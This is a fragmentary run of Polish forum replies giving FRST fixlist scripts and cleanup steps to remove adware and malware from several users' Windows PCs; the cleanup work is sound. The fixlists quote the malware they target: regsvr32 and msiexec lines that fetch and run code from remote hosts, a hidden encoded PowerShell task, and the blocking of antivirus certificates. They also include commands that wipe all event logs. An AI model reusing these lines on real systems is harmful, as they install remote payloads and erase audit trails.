775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== UWAGA HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== UWAGA HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== UWAGA HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== UWAGA HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== UWAGA HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== UWAGA HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== UWAGA HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== UWAGA HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA GroupPolicy: Ograniczenia - Chrome <==== UWAGA HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\Run: [AdobeBridge] => [X] HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = C:\Users\Rafał\AppData\Roaming\Standoor C:\Users\Rafał\AppData\Local\Standoor C:\Program Files (x86)\Standoor C:\Users\Rafał\AppData\Roaming\Firefox C:\Users\Rafał\AppData\Local\Firefox C:\Program Files (x86)\Firefox DeleteKey: HKCU\Software\Standoor DeleteKey: HKLM\SOFTWARE\WOW6432Node\Standoor DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Standoor\Application\chrome.exe <==== UWAGA S3 AndnetBus; \SystemRoot\System32\drivers\lgandnetbus64.sys [X] S3 AndNetDiag; \SystemRoot\system32\DRIVERS\lgandnetdiag64.sys [X] S3 ANDNetModem; \SystemRoot\system32\DRIVERS\lgandnetmodem64.sys [X] U0 aswVmm; Brak ImagePath S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X] S2 uxstyle; \??\C:\Windows\system32\Drivers\elytsxu.sys [X] 2017-10-15 00:37 - 2017-10-15 00:37 - 000004608 _____ C:\Windows\SECOH-QAD.exe 2017-10-15 00:37 - 2017-10-15 00:37 - 000003584 _____ C:\Windows\SECOH-QAD.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II Emperor Edition\Deinstalacja programu Total War ROME II Emperor Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II Emperor Edition\Total War ROME II Emperor Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II Emperor Edition\Uninstall Total War ROME II Emperor Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stronghold Crusader 2\Stronghold Crusader 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stronghold Crusader 2\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SEGA\Total War ROME II - Emperor Edition\Deinstalacja programu Total War ROME II - Emperor Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SEGA\Total War ROME II - Emperor Edition\Total War ROME II - Emperor Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Rights of Man\Europa Universalis IV Rights of Man.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Rights of Man\Uninstall Europa Universalis IV Rights of Man.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Usuń Call of Duty.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Zagraj w Call of Duty dla jednego gracza (tryb awaryjny).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Zagraj w Call of Duty dla jednego gracza.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Zagraj w Call of Duty dla wielu graczy (tryb awaryjny).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Zagraj w Call of Duty dla wielu graczy.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Call of Duty - Pomoc\Czytaj To.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Call of Duty - Pomoc\Dokumentacja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty\Call of Duty - Pomoc\Instrukcja (Wymagany Adobe Reader).lnk C:\Users\Rafał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Delete Doctor\Delete Doctor.lnk C:\Users\Rafał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Delete Doctor\Help.lnk C:\Users\Rafał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Delete Doctor\Uninstall.lnk C:\Users\Rafał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Rafał\AppData\Local\Mozilla C:\Users\Rafał\AppData\Roaming\Mozilla C:\Users\Rafał\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Rafał\AppData\Local CMD: dir /a C:\Users\Rafał\AppData\LocalLow CMD: dir /a C:\Users\Rafał\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Ustaw tą lub jakąkolwiek inną przeglądarkę jako domyślną (powtórz akcje nawet jeśli tak jest). To wymagany krok w celu cofnięcia modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). standoor;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Zastosuj AdwCleaner z opcji Szukaj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

W porządku, w takim razie sama aktualizacja wystarczy. Jak oceniasz obecną sytuację, co chcesz jeszcze naprawić?

Raporty nie wykazują oznak infekcji. W spoilerze zadaję działania poboczne, czyli mała kosmetyka systemowa + kasacji polityki ograniczającej Windows Defender. Temat przenoszę do działu Hardware, bo podejrzewam problemy sprzętowe. Dostarcz raport z CrystalDiskInfo w celu analizy dysku

Niepoprawne raporty kasuje. Raporty mają być bez dat, czyli nie z archiwalnego C:\FRST, a z miejsca, z którego został uruchomiony FRST.

To normalny efekt przy stawianiu przeglądarki na nowo. Czy teraz jest wszystko w porządku z przeglądarką? Dlaczego o tym nie napisałeś? Ja poprosiłem o ponowny skan, więc powinieneś go wykonać. Proszę więc o niego ponownie. Zrób proszę Screena tego.

Bazy danych MBAM są aktualne, ale sam program nie. Odinstaluj go i zainstaluj na nowo korzystając z najnowszej wersji na stronie producenta + powtórz akcje. Tj. w pkt. 1 wykonaj jeszcze to: DeleteKey: HKLM\SOFTWARE\Microsoft\{cc6eb6d8-85b7-435p-8b86-51e4d16ea76d} DeleteKey: HKLM\SOFTWARE\Microsoft\{6711eba6-cf08-4edw-9528-86004fa424bb} DeleteKey: HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}

Przecież napisałem: Czyli wszystko z Auslogics zostaje, usuwam tylko infekcyjne klucze z rejestru. AdwCleaner w ogóle nie ruszaj - wszystko załatwi skrypt w pkt. 1.

Spory bałagan. Przeglądarka Google Chrome, Mozilla FireFox zostały podmienione na fałszywe, a w pozycjach startowych widać adware. Powinniśmy się z tym szybko uporać, ale pracy będzie sporo. P.S: Na przyszłość to nie sugeruj się liczbą zagrożeń, bo MBAM liczy wszystko osobno. Przykładowo: zarażony C:\Malware ma 100 plików, więc MBAM wykryje ich 101 (folder + pliki). Liczba kompletnie nie gra roli. 1. Przez Panel Sterownia odinstaluj program adware / PUP: SafeFinder. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) C:\Users\Dominika\AppData\Roaming\Bagsarah C:\Users\Dominika\AppData\Local\Bagsarah C:\Program Files (x86)\Bagsarah C:\Users\Dominika\AppData\Roaming\Firefox C:\Users\Dominika\AppData\Local\Firefox C:\Program Files (x86)\Firefox DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1280708189-2280317887-4227462502-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Dominika\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku Task: {10C4C4D3-D694-405C-B309-DAEE641E53F7} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== scrobj.dll Task: {B1B0AA40-3FBD-49CF-B3DC-839452D9C943} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== scrobj.dll C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e47bec1afdef1bd6\Google Chrome.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj81RjEcMWH5NjMdMWUdNTU2RWlQN8NWRUI1OTJLOWF2RF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-1280708189-2280317887-4227462502-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn5dJ8gs0DGDT3GOWsi_8CTz4dOMjrasBb05J-kqFPYL6aGkbk1a7SfBXshw_E4R5ZfAZJ2DOGVtS9jmRZOGfECXJS6H3pc1-XM8CzdfyW8TtE3oMhuaNz4M_4h85CbfMP6V2R5336pIuADtrIbfUoIA4RZu28ZKglr4zLZxxjy2WMY3W3ze8EmR&q={searchTerms} SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope - brak wartości SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR DefaultSearchURL: Default -> hxxp://feed.safefinder.biz/?fext=true&publisherid=51218&publisher=extensiondefaultap&st=ed&q={searchTerms} CHR DefaultSearchKeyword: Default -> lp S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X] S2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [X] S3 avchv; \SystemRoot\system32\DRIVERS\avchv.sys [X] S3 dbx; system32\DRIVERS\dbx.sys [X] S1 tcfd_vw_1_10_0_22; system32\drivers\tcfd_vw_1_10_0_22.sys [X] 2016-05-30 11:54 - 2016-05-30 11:54 - 006859776 _____ () C:\Users\Dominika\AppData\Roaming\agent.dat 2016-05-30 11:54 - 2016-05-30 11:54 - 000065616 _____ () C:\Users\Dominika\AppData\Roaming\Config.xml 2016-05-30 11:52 - 2016-05-30 11:53 - 000014448 _____ () C:\Users\Dominika\AppData\Roaming\InstallationConfiguration.xml 2016-05-30 11:52 - 2016-05-30 11:52 - 000128512 _____ () C:\Users\Dominika\AppData\Roaming\Installer.dat 2016-05-30 11:54 - 2016-05-30 11:54 - 000018432 _____ () C:\Users\Dominika\AppData\Roaming\Main.dat 2016-05-30 11:54 - 2016-05-30 11:54 - 000005568 _____ () C:\Users\Dominika\AppData\Roaming\md.xml 2016-05-30 11:54 - 2016-05-30 11:54 - 000126464 _____ () C:\Users\Dominika\AppData\Roaming\noah.dat 2016-05-30 11:54 - 2016-05-30 11:54 - 001756123 _____ () C:\Users\Dominika\AppData\Roaming\Qvo-Air.tst 2016-05-30 11:55 - 2016-05-30 11:55 - 000032038 _____ () C:\Users\Dominika\AppData\Roaming\uninstall_temp.ico C:\Users\Dominika\Desktop\PERSONIA ZUZA\SPRZEDAŻ\OFERTY\SZKOLENIE\Szkolenia\2016\TEGRO\doskonalenie sprzedaży\doskonalenie sprzedaży — skrót.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wysyłanie do programu OneNote.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Outlook.lnk C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Dominika\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Dominika\AppData\Local CMD: dir /a C:\Users\Dominika\AppData\LocalLow CMD: dir /a C:\Users\Dominika\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} CMD: advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 3. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 4. Ustaw Google Chrome lub Mozilla FireFox jako domyślną przeglądarkę - to wymagany krok, aby cofnąć modyfikacje infekcji. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zastosuj AdwCleaner z opcji Szukaj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko pomyślnie wykonane. Jedziemy z poprawkami. Elementy detekcji z AdwCleaner usunę sam, bo wykrył cały Auslogics, a to nie do końca poprawna detekcja. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Microsoft\{cc6eb6d8-85b7-435p-8b86-51e4d16ea76d} HKLM\SOFTWARE\Microsoft\{6711eba6-cf08-4edw-9528-86004fa424bb} HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154} C:\Program Files (x86)\13fukibw C:\Program Files (x86)\1vy2pii8 C:\Program Files (x86)\9ov8ah3e C:\Program Files (x86)\kwxorm13 C:\Program Files (x86)\d86rkjxq C:\Program Files (x86)\el0b8ewt C:\Program Files (x86)\n07xql29 C:\Program Files (x86)\s3n720ba C:\Program Files (x86)\vp7o8qdl nointegritychecks on: Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz na dysku, więc robisz tylko komplet aktualizacji programu i bazy danych). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Dostarcz plik Fixlog.

Poniżej zaktualizowane instrukcje. Akcje z AdwCleaner wykonasz jeszcze raz za pomocą najnowszej wersji, bo aktualnie korzystasz z bardzo starej, to samo jest z Malwarebytes - wszystko uaktualnij. Reset Mozilla FireFox trzeba zrobić na innych zasadach niż Ty zrobiłaś: czyli reset synchronizacji > reszta kroków. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\Run: [5400625] => "C:\Users\Agata\AppData\Roaming\qtbfehtpxob\m53tfii2wrl.exe" /VERYSILENT C:\Users\Agata\AppData\Roaming\qtbfehtpxob HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM-x32 -> DefaultScope - brak wartości SearchScopes: HKU\S-1-5-21-233006258-18527085-3623643150-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-233006258-18527085-3623643150-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = SearchScopes: HKU\S-1-5-21-233006258-18527085-3623643150-1000 -> {DC91FAFB-6CEA-49E5-BB74-9CEE75D09B77} URL = FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X] S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X] S1 dqkcaurg; \??\C:\Windows\system32\drivers\dqkcaurg.sys [X] S1 unzpezbg; \??\C:\Windows\system32\drivers\unzpezbg.sys [X] 2017-10-12 17:48 - 2017-10-13 01:19 - 000000000 ____D C:\Program Files\8ZCB25VOSK 2017-10-12 17:45 - 2017-10-13 01:19 - 000000000 ____D C:\Program Files\129TZA7WHV 2017-10-12 17:47 - 2017-10-13 01:19 - 000000000 ____D C:\Program Files (x86)\L0qObltTFUur 2017-10-12 17:47 - 2017-10-13 01:19 - 000000000 ____D C:\Program Files (x86)\fbg33l1j5hc 2017-10-12 17:47 - 2017-10-13 20:11 - 000000000 ____D C:\Users\Agata\AppData\Roaming\nt0qd4ngbvo 2017-10-12 17:46 - 2017-10-13 19:00 - 000000000 ____D C:\Users\Agata\AppData\Roaming\qtbfehtpxob 2017-10-11 21:45 - 2017-10-11 21:45 - 000358400 _____ C:\Windows\0c27bc2489ccbd6abf90736157684dfa.exe 2017-10-11 21:45 - 2017-10-11 21:45 - 000037170 _____ C:\Windows\uninstaller.dat C:\Users\Agata\AppData\Roaming\Microsoft\Office\Niedawny\INTENSO (F).LNK C:\Users\Agata\AppData\Roaming\Microsoft\Office\Niedawny\Vulvakarzinome 2017.ppt.LNK Task: {1233F3AE-C05F-4E7C-87F4-B0BBB58D2453} - System32\Tasks\{7D7A7E47-0A0D-0A7E-0511-0B7E087D1178} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABQAHIA (dane wartości zawierają 9996 znaków więcej). <==== UWAGA Task: {8B24F83C-9A61-494D-99B9-24EDCDC0CB66} - System32\Tasks\Moon Manager => C:\Windows\system32\rundll32.exe "C:\Program Files\Moon Manager\Moon Manager.dll",sfaPDJrqo <==== UWAGA Task: {5F4BB55D-19E5-4B62-8F24-567E6325718D} - System32\Tasks\L0qObltTFUur => l0qoblttfuur.exe C:\Program Files\Moon Manager AlternateDataStreams: C:\ProgramData\TEMP:07BF512B [135] AlternateDataStreams: C:\ProgramData\TEMP:BFE23423 [362] CMD: dir /a C:\Windows CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Agata\AppData\Local CMD: dir /a C:\Users\Agata\AppData\LocalLow CMD: dir /a C:\Users\Agata\AppData\Roaming DeleteKey: HKU\S-1-5-21-233006258-18527085-3623643150-1000\CONSOLE\%SYSTEMROOT%_SYSTEM32_SVCHOST.EXE DeleteKey: HKU\S-1-5-21-233006258-18527085-3623643150-1000\CONSOLE\TASKENG.EXE DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany 